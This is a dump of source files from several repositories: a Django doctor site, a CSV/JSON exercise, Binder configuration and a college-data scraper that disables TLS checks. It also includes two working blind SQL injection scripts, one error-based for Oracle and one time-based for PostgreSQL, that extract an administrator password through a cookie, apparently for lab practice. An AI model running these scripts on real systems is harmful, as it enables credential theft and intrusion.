AppConfig\n\n\nclass SiteViewsConfig(AppConfig):\n default_auto_field = 'django.db.models.BigAutoField'\n name = 'site_views'\n" }, { 
"alpha_fraction": 0.7257462739944458, "alphanum_fraction": 0.7257462739944458, "avg_line_length": 47.727272033691406, "blob_id": "aefa46e53f531aca72aaef73b64f1bce90b55fb6", "content_id": "35b71b0f01750aa953892867ed05e0503276e19f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 536, "license_type": "no_license", "max_line_length": 120, "num_lines": 11, "path": "/site_user/urls.py", "repo_name": "Javad2383/doctor", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom .views import (site_login, site_register_doctor, site_register_choice, site_register_patient, site_forgot_password)\n\napp_name = \"User\"\nurlpatterns = [\n path('login', site_login, name=\"login_view\"),\n path('register-doctor', site_register_doctor, name=\"register_doctor\"),\n path('register-patient', site_register_patient, name=\"register_patient\"),\n path('register-type', site_register_choice, name=\"register_type\"),\n path('forgot-password', site_forgot_password, name=\"forgot_password\"),\n]\n" }, { "alpha_fraction": 0.6746031641960144, "alphanum_fraction": 0.6746031641960144, "avg_line_length": 30.5, "blob_id": "146acfc87f96cf6e66c0d129b82c85004ec4be2d", "content_id": "0a0ade0b68347ae09cc9db6fef03bdd3dee85e36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 252, "license_type": "no_license", "max_line_length": 63, "num_lines": 8, "path": "/doctor/urls.py", "repo_name": "Javad2383/doctor", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom django.urls import path, include\n\nurlpatterns = [\n path('', include('site_views.urls', namespace=\"Views\")),\n path('user/', include('site_user.urls', namespace=\"User\")),\n path('admin/', admin.site.urls),\n]\n" }, { "alpha_fraction": 0.6736111044883728, "alphanum_fraction": 0.6736111044883728, "avg_line_length": 19.571428298950195, "blob_id": "3ae234e23089961faf407094341ea4ca0e0f0ff0", 
"content_id": "a9ac4d6ae38ce76befc4d57c79af0b81f399d737", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 144, "license_type": "no_license", "max_line_length": 44, "num_lines": 7, "path": "/site_views/urls.py", "repo_name": "Javad2383/doctor", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom .views import (site_index)\n\napp_name = 'Views'\nurlpatterns = [\n path('', site_index, name=\"index_view\"),\n]\n" }, { "alpha_fraction": 0.7014681696891785, "alphanum_fraction": 0.7014681696891785, "avg_line_length": 22.576923370361328, "blob_id": "d33156f6fde99991b8e674516de169ab76e8bdd4", "content_id": "966dda6953f73548b406c8962cc3e5bb86b0ad11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 613, "license_type": "no_license", "max_line_length": 65, "num_lines": 26, "path": "/site_user/views.py", "repo_name": "Javad2383/doctor", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\n\n\ndef site_login(request):\n context = {}\n return render(request, \"user/login.html\", context)\n\n\ndef site_register_choice(request):\n context = {}\n return render(request, \"user/register_choice.html\", context)\n\n\ndef site_register_doctor(request):\n context = {}\n return render(request, \"user/register_doctor.html\", context)\n\n\ndef site_register_patient(request):\n context = {}\n return render(request, \"user/register_patient.html\", context)\n\n\ndef site_forgot_password(request):\n context = {}\n return render(request, \"user/forgot_password.html\", context)\n" } ]
7
mefeleth/Blind-SQL-Injection
https://github.com/mefeleth/Blind-SQL-Injection
b0eaded494769d2340ef2d9a44b1b6f5c3b4ff81
a16dac8d94b89f5f73b6c2a9910b38d96ff1a61d
fe58a9ecefb1167960312932717f8b33f511052d
refs/heads/master
2023-05-05T22:34:45.960874
2021-05-22T16:12:53
2021-05-22T16:12:53
369,852,288
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6034361720085144, "alphanum_fraction": 0.6164095401763916, "avg_line_length": 38.0684928894043, "blob_id": "bc09fc6fe8fdb07953d2de28dd2440f6b899ef9f", "content_id": "664bab5666c0f8dbdad1226b1063c96cebc05163", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2852, "license_type": "no_license", "max_line_length": 207, "num_lines": 73, "path": "/sqli_case_when.py", "repo_name": "mefeleth/Blind-SQL-Injection", "src_encoding": "UTF-8", "text": "import requests\nimport optparse\n\npassword = \"\"\npassword_length = 0\n\ndef get_args():\n parser = optparse.OptionParser()\n parser.add_option(\"-u\", \"--url\", dest=\"url\", help=\"URL in format http(s)://<url>\")\n parser.add_option(\"-s\", \"--session\", dest=\"session\", help=\"Session cookie in format: cookie_name=cookie_value\")\n parser.add_option(\"-t\", \"--token\", dest=\"cookie\", help=\"Token cookie in format: token_name=token_value\")\n (options, arguments) = parser.parse_args()\n if not options.url:\n parser.error(\"[-] Please specify url, use --help for more info.\")\n elif not options.session:\n parser.error(\"[-] Please specify session cookie, use --help for more info.\")\n elif not options.cookie:\n parser.error(\"[-] Please specify token cookie, use --help for more info.\")\n return options\n\noptions = get_args()\nurl = options.url\nsession = options.session\ncookie = options.cookie\n\ndef check_if_vulnerable(url,session,cookie):\n response1 = requests.get(url,\n headers={'Cookie':cookie+'\\'; '+session})\n response2 = requests.get(url,\n headers={'Cookie':cookie+'\\'\\'; '+session})\n if response1.status_code == 500 and response2.status_code == 200:\n print(\"[+] Target probably vulnerable\")\n else:\n print(\"[-] Target might not be vulnerable\")\n\n\ndef check_password_length(url,session,cookie):\n for i in range(1,30,1):\n response = requests.get(url,\n headers={'Cookie':cookie+'\\' UNION SELECT CASE WHEN 
(username=\\'administrator\\' AND LENGTH(password) = '\n +str(i)+') THEN to_char(1/0) ELSE NULL END FROM users--; '+session})\n if response.status_code == 500:\n password_length = i\n print(\"[+] Password length is \" + str(password_length))\n return password_length\n if password_length == 0:\n print(\"[-] Could not find password length\") \n\n\ndef make_req(url,session,cookie):\n password_length = check_password_length(url,session,cookie)\n password = \"\"\n charString = \"0123456789abcdefghijklmnopqrstuvwxyz\"\n for i in range(1,password_length+1,1):\n for j in charString:\n response = requests.get(url,\n headers={'Cookie':cookie+'\\' UNION SELECT CASE WHEN (username=\\'administrator\\' AND SUBSTR(password,'+str(i)+',1)=\\''+str(j)+'\\') THEN to_char(1/0) ELSE NULL END FROM users--; '+session})\n if response.status_code == 500:\n password += j\n print(\"[*] Discovering password: \" + password)\n else:\n continue\n # if password not empty\n if password:\n print(\"[+] The password is \" + password)\n return password\n else:\n print(\"[-] Could not find password. 
Exiting...\")\n exit(1)\n\n\ncheck_if_vulnerable(url, session, cookie)\nmake_req(url, session, cookie)\n" }, { "alpha_fraction": 0.6102418303489685, "alphanum_fraction": 0.6223328709602356, "avg_line_length": 39.753623962402344, "blob_id": "3c94c3b8ddb7fcead32daee8dd97d08334bc133b", "content_id": "a129b7fd85df74a508161ea1f22ad53fee2f2f36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2812, "license_type": "no_license", "max_line_length": 213, "num_lines": 69, "path": "/time_based.py", "repo_name": "mefeleth/Blind-SQL-Injection", "src_encoding": "UTF-8", "text": "import requests\nimport optparse\nimport math\n\npassword = \"\"\npassword_length = 0\n\ndef get_args():\n parser = optparse.OptionParser()\n parser.add_option(\"-u\", \"--url\", dest=\"url\", help=\"URL in format http(s)://<url>\")\n parser.add_option(\"-s\", \"--session\", dest=\"session\", help=\"Session cookie in format: cookie_name=cookie_value\")\n parser.add_option(\"-t\", \"--token\", dest=\"cookie\", help=\"Token cookie in format: token_name=token_value\")\n (options, arguments) = parser.parse_args()\n if not options.url:\n parser.error(\"[-] Please specify url, use --help for more info.\")\n elif not options.session:\n parser.error(\"[-] Please specify session cookie, use --help for more info.\")\n elif not options.cookie:\n parser.error(\"[-] Please specify token cookie, use --help for more info.\")\n return options\n\noptions = get_args()\nurl = options.url\nsession = options.session\ncookie = options.cookie\n\ndef check_if_vulnerable(url,session,cookie):\n response = requests.get(url,\n headers={'Cookie':cookie+'\\'||pg_sleep(10)--; '+session})\n if response.elapsed.total_seconds() >= math.floor(10):\n print(\"[+] Target probably vulnerable\")\n else:\n print(\"[-] Target might not be vulnerable\")\n\ndef check_password_length(url,session,cookie):\n for i in range(1,30,1):\n response = requests.get(url,\n 
headers={'Cookie':cookie+'\\'||(SELECT CASE WHEN (username=\\'administrator\\' AND LENGTH(password) = '+str(i)+') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users)||\\'; '+session})\n if response.elapsed.total_seconds() >= math.floor(10):\n password_length = i\n print(\"[+] Password length is \" + str(password_length))\n return password_length\n if password_length == 0:\n print(\"[-] Could not find password length\") \n\n\ndef make_req(url,session,cookie):\n password_length = check_password_length(url,session,cookie)\n password = \"\"\n charString = \"0123456789abcdefghijklmnopqrstuvwxyz\"\n for i in range(1,password_length+1,1):\n for j in charString:\n response = requests.get(url,\n headers={'Cookie':cookie+'\\'||(SELECT CASE WHEN (username=\\'administrator\\' AND SUBSTRING(password,'+str(i)+',1) = \\''+str(j)+'\\') THEN pg_sleep(5) ELSE pg_sleep(0) END FROM users)||\\'; '+session})\n if response.elapsed.total_seconds() >= math.floor(4.5):\n password += j\n print(\"[*] Discovering password: \" + password)\n else:\n continue\n # if password not empty\n if password:\n print(\"[+] The password is \" + password)\n return password\n else:\n print(\"[-] Could not find password. Exiting...\")\n exit(1)\n\ncheck_if_vulnerable(url, session, cookie)\nmake_req(url, session, cookie)\n" }, { "alpha_fraction": 0.7978494763374329, "alphanum_fraction": 0.7989247441291809, "avg_line_length": 92, "blob_id": "9ab1784e58aaaa8a2a8fa69346ee8565e072ab12", "content_id": "be1a4b90de886afc05c7e83b725403675530f304", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 930, "license_type": "no_license", "max_line_length": 491, "num_lines": 10, "path": "/README.md", "repo_name": "mefeleth/Blind-SQL-Injection", "src_encoding": "UTF-8", "text": "# Conditional Error-based Blind SQL Injection - Oracle DB\nScript for performing Conditional Error-based Blind SQL Injection on Oracle Database, where the injection point is a tracking cookie. 
This attack was used to obtain administrator password from users table\n\nUsage: \npython3 -u http(s)://\\<url\\> -s session_cookie_name=session_cookie_value -t token_name=token_value \\<script_name\\>.py\n\nExample: \n![Alt text](/example.png?raw=true)\n\nThese tools are for educational purposes and legal activity only, meaning that you can use them solely on the systems that you have specific written permission to do so. Any actions and/or activities related to these tools are solely your responsibility. The misuse of these tools can result in criminal charges brought against the persons in question. I will not be held responsible in the event any criminal charges be brought against any individuals misusing these tools to break the law.\n" } ]
3
Kwuarm/Laboration-2
https://github.com/Kwuarm/Laboration-2
fd2196c59555f410e9e9c8db0112825e4c6af593
f061ba5093aa5291ddd2c4172f56e7700caba851
0f4e9511edd5d4385d8e274c143e67d81d89e264
refs/heads/master
2020-12-22T23:17:05.747607
2020-01-29T10:49:07
2020-01-29T10:49:07
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7777777910232544, "alphanum_fraction": 0.7777777910232544, "avg_line_length": 10.666666984558105, "blob_id": "ee91dba1d7c8c0d93bbbca5a3bdb51dfef1419c8", "content_id": "865f1d82ec196360b407232583ee8bea77e3571a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 36, "license_type": "no_license", "max_line_length": 20, "num_lines": 3, "path": "/i9i8i7/program.py", "repo_name": "Kwuarm/Laboration-2", "src_encoding": "UTF-8", "text": "import modul\r\n\r\nmodul.introduction()" }, { "alpha_fraction": 0.5225143432617188, "alphanum_fraction": 0.5291628837585449, "avg_line_length": 29.53333282470703, "blob_id": "9083e7e418dc3b8b895b05bcd306a1c721f673d6", "content_id": "d7beb06f5ad7dd00eea26576d07e66b29fb93deb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3313, "license_type": "no_license", "max_line_length": 75, "num_lines": 105, "path": "/i9i8i7/modul.py", "repo_name": "Kwuarm/Laboration-2", "src_encoding": "UTF-8", "text": "import csv\r\nimport json\r\n\r\ndef introduction():\r\n print(\"Välkommen till programmet.\")\r\n choice = \"\"\r\n epiclist = startup()\r\n\r\n while choice != 6:\r\n print(\"\\n[1] - Läs in csv-fil\")\r\n print(\"[2] - Visa json-data\")\r\n print(\"[3] - Lägg till person\")\r\n print(\"[4] - Ta bort person\")\r\n print(\"[5] - Spara fil\")\r\n print(\"[6] - Avsluta\")\r\n\r\n try:\r\n choice = int(input(\"Vilket alternativ vill du välja? \"))\r\n except ValueError:\r\n print(\"Oops! 
That's not a number!\")\r\n\r\n if choice == 1:\r\n epiclist = readfromfile()\r\n elif choice == 2:\r\n viewjson(epiclist)\r\n print(\"JSON-data has been shown\")\r\n elif choice == 3:\r\n addperson(epiclist)\r\n print(\"Personen har blivit tillagd!\")\r\n elif choice == 4:\r\n delperson(epiclist)\r\n print(\"Personen har tagits bort!\")\r\n elif choice == 5:\r\n saveasjson(epiclist)\r\n print(\"Filen har sparats!\")\r\n elif choice == 6:\r\n print(\"You have chosen to exit the program.\")\r\n else:\r\n print(\"Please choose a number 1-6!\")\r\n\r\ndef startup():\r\n epiclist = []\r\n try:\r\n with open('data.json', 'r', encoding='UTF-8') as File:\r\n print(\"Json filen finns! wow\")\r\n epiclist = json.load(File)\r\n except Exception as p:\r\n print(p)\r\n epiclist = readfromfile(False)\r\n #testa om csv filen finns\r\n return epiclist\r\n\r\ndef readfromfile(afterstartup = True):\r\n randomlist = []\r\n try:\r\n with open('personer.csv', newline='', encoding='UTF-8') as csvfile:\r\n spamreader = csv.reader(csvfile, delimiter=';')\r\n for row in spamreader:\r\n #print(', '.join(row))\r\n d = {}\r\n d[\"fnamn\"] = row[0]\r\n d[\"enamn\"] = row[1]\r\n d[\"email\"] = row[3]\r\n randomlist.append(d)\r\n if (afterstartup):\r\n for line in randomlist:\r\n print(line)\r\n print(\"CSV-file has now been loaded.\")\r\n return randomlist\r\n except FileNotFoundError:\r\n print(\"File Not Found\")\r\n\r\ndef viewjson(epiclist):\r\n print(epiclist)\r\n # try:\r\n # with open('data.json') as data_file:\r\n # print(\"Successful\")\r\n # except:\r\n # saveasjson(epiclist)\r\n # with open('data.json') as data_file:\r\n # data_loaded = json.load(data_file)\r\n # for lines in data_loaded:\r\n # print(lines)\r\n\r\ndef addperson(epiclista):\r\n addstuff = {}\r\n addstuff[\"fnamn\"] = input(\"Skriv in namn: \")\r\n addstuff[\"enamn\"] = input(\"Skriv in efternamn: \")\r\n addstuff[\"email\"] = input(\"Skriv in email: \")\r\n print(addstuff)\r\n epiclista.append(addstuff)\r\n return 
epiclista\r\n\r\ndef delperson(epiclist):\r\n try:\r\n deleteperson = int(input(\"Vem vill du ta bort? Nummer: \"))\r\n epiclist.pop(deleteperson)\r\n print(f'Removed person number: {deleteperson}!')\r\n except ValueError:\r\n print(\"Deletion of person has failed.\")\r\n return epiclist\r\n\r\ndef saveasjson(epiclist):\r\n with open('data.json', 'w', encoding='UTF-8') as outfile:\r\n json.dump(epiclist, outfile, ensure_ascii=False, indent=2)" } ]
2
andrewjohnlowe/binder_test
https://github.com/andrewjohnlowe/binder_test
3a6eb103e176483e03a846dff356948686b9c4f9
9c6f5329761d3dfa7694f5618f6dc7a9a1b024d6
6aa1a56d4aa9390e9b91242803e5a67e556acd1a
refs/heads/master
2021-08-26T03:41:27.864258
2017-11-21T13:44:40
2017-11-21T13:44:40
110,274,064
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.7015384435653687, "alphanum_fraction": 0.7384615540504456, "avg_line_length": 16.105262756347656, "blob_id": "f897d56b361b42c84833f994750a37cb6ad8b933", "content_id": "5bd759449a7d87b331819fdbb67b2ea43e0f4d35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 325, "license_type": "no_license", "max_line_length": 84, "num_lines": 19, "path": "/README.md", "repo_name": "andrewjohnlowe/binder_test", "src_encoding": "UTF-8", "text": "## Important\n\nTo convert Rmd to ipynb:\n\nFrom Anaconda Prompt:\n\n```\nnotedown --nomagic test.Rmd > test.ipynb\n```\n\nThen:\n\n```\npython rify.py test.ipynb\n```\n\nwhich will add the metadata so that the R kernel will start automatically in Binder.\n\n[Source](https://github.com/jupyterhub/binderhub/issues/261#issuecomment-345987238)\n" }, { "alpha_fraction": 0.6349206566810608, "alphanum_fraction": 0.658730149269104, "avg_line_length": 20, "blob_id": "fed650afb1f2816f9471050d99c1a92d30eba55e", "content_id": "e95e27a123d9dd6ef716da074ce54c284885a709", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 126, "license_type": "no_license", "max_line_length": 56, "num_lines": 6, "path": "/Dockerfile", "repo_name": "andrewjohnlowe/binder_test", "src_encoding": "UTF-8", "text": "FROM rocker/binder:3.4.2\n\n# Run install.r if it exists\nRUN if [ -f install.R ]; then R --quiet -f install.R; fi\n\nCOPY . 
$HOME\n" }, { "alpha_fraction": 0.4896421730518341, "alphanum_fraction": 0.4990583658218384, "avg_line_length": 18.66666603088379, "blob_id": "de6f00114323b0c266157c71ffafe7f27d2b2406", "content_id": "63f64e86408123d98521e7f148ada047135a3a2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 531, "license_type": "no_license", "max_line_length": 39, "num_lines": 27, "path": "/rify.py", "repo_name": "andrewjohnlowe/binder_test", "src_encoding": "UTF-8", "text": "import sys\nimport json\n\nrspec = {\n \"kernelspec\": {\n \"display_name\": \"R\",\n \"language\": \"R\",\n \"name\": \"ir\"\n },\n \"language_info\": {\n \"codemirror_mode\": \"r\",\n \"file_extension\": \".r\",\n \"mimetype\": \"text/x-r-source\",\n \"name\": \"R\",\n \"pygments_lexer\": \"r\",\n \"version\": \"3.4.1\"\n }\n}\n\nipynb = sys.argv[1]\n\nwith open(ipynb, 'r') as f:\n data = json.loads(f.read())\ndata['metadata'].update(rspec)\n\nwith open(ipynb, 'w') as f:\n f.write(json.dumps(data, indent=2))\n" } ]
3
Nikhil-Kr/CollegeCrawler
https://github.com/Nikhil-Kr/CollegeCrawler
e8d02dc2ed1088508514aead7ea12b130a027766
98e29edbb4968e2a3cb61dce9ac8f3c6eaf0c846
3ca06f901b9ebf9a054ecd23e42e40ed0c5ca26d
refs/heads/master
2021-01-01T03:50:39.412521
2016-05-19T15:52:22
2016-05-19T15:52:22
59,220,957
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.593647301197052, "alphanum_fraction": 0.6035049557685852, "avg_line_length": 27.45161247253418, "blob_id": "8dc075323d10e94f50683ca5dd5569fe92984975", "content_id": "0970697ea442469c3d90bf96f471a37ff6789bec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 913, "license_type": "no_license", "max_line_length": 59, "num_lines": 31, "path": "/logodownload.py", "repo_name": "Nikhil-Kr/CollegeCrawler", "src_encoding": "UTF-8", "text": "import MySQLdb\r\nimport urllib\r\n# Open database connection\r\ndb = MySQLdb.connect(\"127.0.0.1\",\"root\",\"\",\"cdcolleges\" )\r\n\r\n# prepare a cursor object using cursor() method\r\ncursor = db.cursor()\r\n\r\n# Prepare SQL query to INSERT a record into the database.\r\nsql =\"SELECT `CollegeId`,`CollegeLogo` FROM `collegelist`\";\r\ntry:\r\n # Execute the SQL command\r\n cursor.execute(sql)\r\n # Fetch all the rows in a list of lists.\r\n results = cursor.fetchall()\r\n for row in results:\r\n cid=row[0]\r\n clogo=row[1]\r\n clogo=clogo.replace('small','large')\r\n cid=cid+'_logo.jpg';\r\n resource = urllib.urlopen(clogo)\r\n output = open(cid,\"wb\")\r\n output.write(resource.read())\r\n output.close()\r\n #filename=clogo.split('/')[-1]\r\n #print filename\r\n #print \"cid=%s,clogo=%s\" % \\\r\n #(cid,clogo)\r\n #break\r\nexcept:\r\n print \"Error: unable to fecth data\"\r\n" }, { "alpha_fraction": 0.8470588326454163, "alphanum_fraction": 0.8470588326454163, "avg_line_length": 41.5, "blob_id": "c82299bb4aa797bfa403d6a45b281b2ce1df72a9", "content_id": "e96c079a63e0c849d35e20cf40d47864516d3ff7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 85, "license_type": "no_license", "max_line_length": 67, "num_lines": 2, "path": "/README.md", "repo_name": "Nikhil-Kr/CollegeCrawler", "src_encoding": "UTF-8", "text": "# CollegeCrawler\nA crawler for extracting information about various Indian 
Colleges.\n" }, { "alpha_fraction": 0.4123130142688751, "alphanum_fraction": 0.4252707362174988, "avg_line_length": 56.20147705078125, "blob_id": "9b0f1548c23f404d73cbef71403a7b6bf79b7185", "content_id": "ef73d9cba1ffd6caf9ca1933648cbb76c59d9c9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 63025, "license_type": "no_license", "max_line_length": 792, "num_lines": 1082, "path": "/collegescraper.py", "repo_name": "Nikhil-Kr/CollegeCrawler", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\nfrom multiprocessing import Pool\r\nimport re\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nrequests.packages.urllib3.disable_warnings()\r\nimport MySQLdb\r\nimport time\r\n\r\n#module for opening links where both redirects and certificate verification are disabled\r\ndef open_url(url):\r\n return requests.get(url,allow_redirects=False,verify=False)\r\n\r\n#module for opening links where certificate verification is disabled\r\ndef open_url1(url):\r\n return requests.get(url,verify=False)\r\n\r\ndef degree_short_filter(degree_short):\r\n degree_short=degree_short.replace(\"&nbsp;\",\"\")\r\n degree_short=degree_short.replace(\" \",\"\")\r\n return degree_short\r\n \r\n#module for filtering college type(public/private)\r\ndef filter_college_type(pubpvt):\r\n pubpvt = pubpvt.replace(\"'\",\"\")\r\n pubpvt = pubpvt.replace(\"Â\",\"\")\r\n pubpvt = pubpvt.replace(\"&nbsp;\",\"\")\r\n pubpvt= pubpvt.replace(\"|\",\"\")\r\n pubpvt=pubpvt.replace(\" \",\"\")\r\n pubpvt.rstrip()\r\n pubpvt.lstrip()\r\n return pubpvt\r\n \r\n#module for filtering college name\r\ndef filter_college_name(title):\r\n title = title.replace(\"'\",\"\")\r\n title = title.replace(\"’\",\"\")\r\n #title = title.replace(\"€™\",\"\")\r\n 
title = title.replace(\"Â\",\"\")\r\n title = title.replace(\" \",\"\")\r\n return title\r\n \r\n#module for filtering the college acronym/alias\r\ndef filter_alias(title1):\r\n title1 = title1.replace(\"’\",\"\")\r\n title1 = title1.replace(\"Â\",\"\")\r\n title1= title1.replace(\"'\",\"\")\r\n title1= title1.replace('\"','')\r\n title1= title1.replace(\" \",\"\")\r\n title1= title1.lstrip()\r\n title1= title1.rstrip()\r\n title1=title1.strip()\r\n return title1\r\n\r\n#module for getting the college key for matching with info from other sources after removing all the unnecessary things\r\ndef filter_content_for_college_key(string):\r\n string=string.replace(\"'\",\"\")\r\n string = string.replace(\" of \",\"\")\r\n string = string.replace(\" for \",\"\")\r\n string = string.replace(\" in \",\"\")\r\n string = string.replace(\".\",\"\")\r\n string = string.replace(\"'\",\"\")\r\n string = string.replace(\",\",\"\")\r\n string = string.replace(\";\",\"\")\r\n string = string.replace(\"&\",\"and\")\r\n string = string.replace(\"-\",\"\")\r\n string = string.replace(\" and \",\"\")\r\n string = string.replace(\" \",\"\")\r\n string = string.replace(\" \",\"\")\r\n string = string.lower()\r\n string = string.strip()\r\n string = string.lstrip()\r\n string = string.rstrip()\r\n regex1 = re.compile('\\(.+?\\)')\r\n string = regex1.sub('',string)\r\n return string\r\n\r\n#module for filtering the criteria for admission in college\r\ndef filter_criteria(criteria):\r\n criteria=criteria.replace(\"\\n\",\"\")\r\n criteria=criteria.replace(\" \",\"\")\r\n return criteria\r\n\r\n#module for filtering the procedure for admission in college\r\ndef filter_procedure(procedure):\r\n procedure=procedure.replace(\"Procedure\",\"\")\r\n procedure=procedure.replace(\"\\n\",\"\")\r\n return procedure\r\n\r\n#module for filtering the address of college\r\ndef filter_address(address):\r\n address=address.replace(\",\",\"\")\r\n address=address.replace(\" \",\"\")\r\n 
address=address.replace(\"\\n\",\"\")\r\n return address\r\n\r\n#module for filtering the recruiter list \r\ndef filter_recruiter(r):\r\n r=r.replace(\"'\",\"\")\r\n r=r.replace(\"\\n\",\"\")\r\n r=r.replace(\"\\r\",\"\")\r\n r=r.replace(\"\\r\\n\",\"\")\r\n return r\r\n\r\n#module for filtering the college fees\r\ndef filter_fees(fees):\r\n fees=fees.replace(\"Â\",\"\")\r\n fees=fees.replace(\"(Fees Break-up)\",\"\")\r\n fees=fees.replace(\" \",\"\")\r\n fees=fees.lstrip()\r\n fees=fees.rstrip()\r\n return fees\r\n\r\n#module for finding all the links on a given page\r\ndef find_all_links(page):\r\n return re.findall(' href=\"?([^\\s^\"]+)',page)\r\n\r\n#module for reading/fetching the page content of a particular url \r\ndef get_page_content(f):\r\n return f.text.encode(\"utf-8\")\r\n\r\n#module for parsing and getting plain text\r\ndef get_text(content):\r\n soup=BeautifulSoup(content)\r\n return soup.get_text().strip()\r\n\r\n#module for encoding the plain text \r\ndef encode(string):\r\n string=string.encode('utf-8')\r\n return string\r\n\r\n#module for removing non ascii characters\r\ndef removeNonAscii(s):\r\n return \"\".join(i for i in s if ord(i)<128)\r\n\r\nalias=[] #list to store the college acronym/alias\r\nrecruit=[] #list to store the distinct recruiter names\r\nbranchlist=[] #list to store the distinct branch names \r\ncoursefees=[] #list for storing the course fees\r\ncollegeestd=[] #list for storing the estd of college \r\ncollegetype=[] #list for storing the type of college(pub/pvt)\r\ncollegelogo=[] #list for storing the college logo\r\ncollegename=[] #list for storing the college names\r\ncollegename1=[] #list for storing the college names(after filtering) to match with the other sources\r\ncollegeaddress=[] #list for storing the college address\r\ncollegecriteria=[] #list for storing the criteria for admission into college\r\ncollegeprocedure=[] #list for storing the procedure for admission into college\r\ncollegerecruiters=[] #list for 
storing the college recruiters\r\ncollegesource=[] #list to store the info of the source from where all the data is being picked up\r\nbranchlistfinal=[] #list for storing all the branches(list of list of branches of individual colleges)\r\ncid=[] #list to store the distinct id of each college \r\ncid1=[] #list to store the distinct id of each course\r\ndid=[] #list to store the distinct id of each degree\r\nbid=[] #list to store the distinct id of each branch\r\nrid=[] #list to store the distinct id of each recruiter\r\ndegreelist=[]#to store the list of all degrees offered(abbreviation)\r\ndegreelistfull=[]#list to store the list of all degrees offered(full name)\r\ndegreelinks=[]#list to store the links\r\ncourselist=[] #list to store the list of all courses\r\ncollegewebsite=[] #list to store the college website\r\ncollegeemail=[] #list to store the college email\r\ncollegephone=[] #list to store the college phone number\r\ncollegedegree=[] #list to store the degree offered by the college\r\n\r\nsource=open_url('https://www.collegesearch.in/colleges') #the main url from which we'll fetch our data\r\ncontent=get_page_content(source)\r\ncontent1=content.split('<h3 class=\"visible-xs bold\" style=\"margin: 10px 0px;\">SELECT A COURSE </h3>')\r\ncontent2=content1[1].split('<script>')\r\ncontent3=content2[0].split('<div class=\"panel panel-default pop_exam\">')\r\ncontent4=content2[0].split('<div class=\"media-body pd-left10\">')\r\ndel content4[0]\r\ndel content3[0]\r\n\r\nfor c4 in content4:\r\n c4=c4.split('</h4>')\r\n course=get_text(c4[0])\r\n course=encode(course)\r\n courselist.append(course) #finding the list of all courses\r\n\r\n#print courselist\r\nlength1=len(courselist) #finding the length of the course list\r\n\r\ndb=MySQLdb.connect('127.0.0.1','root','','cdcolleges') #establishing the connection with the db(cdcolleges)\r\ncursor=db.cursor()\r\n \r\n#loop for entering the course list along with distinct course id into it's desired table(courselist) in 
the db\r\nfor cour1 in range(0,length1):\r\n sql=\"INSERT INTO `courselist`(`CourseId`, `CourseName`)VALUES('%s','%s')\"%('C'+str(cour1+1),courselist[cour1])\r\n ckey='C'+str(cour1+1)\r\n cid1.append(ckey)\r\n try:\r\n cursor.execute(sql)\r\n # Commit your changes in the database\r\n db.commit()\r\n except:\r\n # Rollback in case there is any error\r\n db.rollback()\r\n #print sql1\r\n\r\nfor deg in content3:\r\n deg=deg.split('<div class=\"media-body\">')\r\n name=deg[1].split('</div>')\r\n name1=name[0].split('</span>')\r\n name2=name1[0].split('<span class=\"badge\" style=\"background: #grey;\">')\r\n degree_short=get_text(name2[0])\r\n degree_short=degree_short_filter(degree_short)\r\n degree_long=get_text(name1[1])\r\n links=find_all_links(deg[0])\r\n degreelinks.append(links)\r\n degreelist.append(degree_short)#list of degrees(short names)\r\n degreelistfull.append(degree_long)#list of full degree names\r\n\r\ndel degreelist[8]\r\ndel degreelistfull[8]\r\ndel degreelinks[8]\r\n\r\nlength2=len(degreelist) #finding the length of the degree list\r\n\r\n#loop for entering the degree list along with distinct degree id into it's desired table(degree list) in the db\r\nfor deg1 in range(0,length2):\r\n sql=\"INSERT INTO `degreelist`(`DegreeId`, `DegreeName`,`FullDegreeName`)VALUES('%s','%s','%s')\"%('D'+str(deg1+1),degreelist[deg1],degreelistfull[deg1])\r\n dkey='D'+str(deg1+1)\r\n did.append(dkey)\r\n try:\r\n cursor.execute(sql)\r\n # Commit your changes in the database\r\n db.commit()\r\n except:\r\n # Rollback in case there is any error\r\n db.rollback()\r\n #print sql1\r\n\r\ndb.close()#closing the connection to the database(cdcolleges)\r\n\r\nc=0 #counter for various course id's\r\nr1=0 #counter for various recruiter id's\r\nb1=0 #counter for various branch id's\r\nc1=0 #counter for various degree id's\r\n\r\n#print did\r\n#print degreelinks\r\n#print len(degreelinks)\r\n#print degreelist\r\n#print degreelistfull\r\n\r\nlinklistfull=[] #list for all the links 
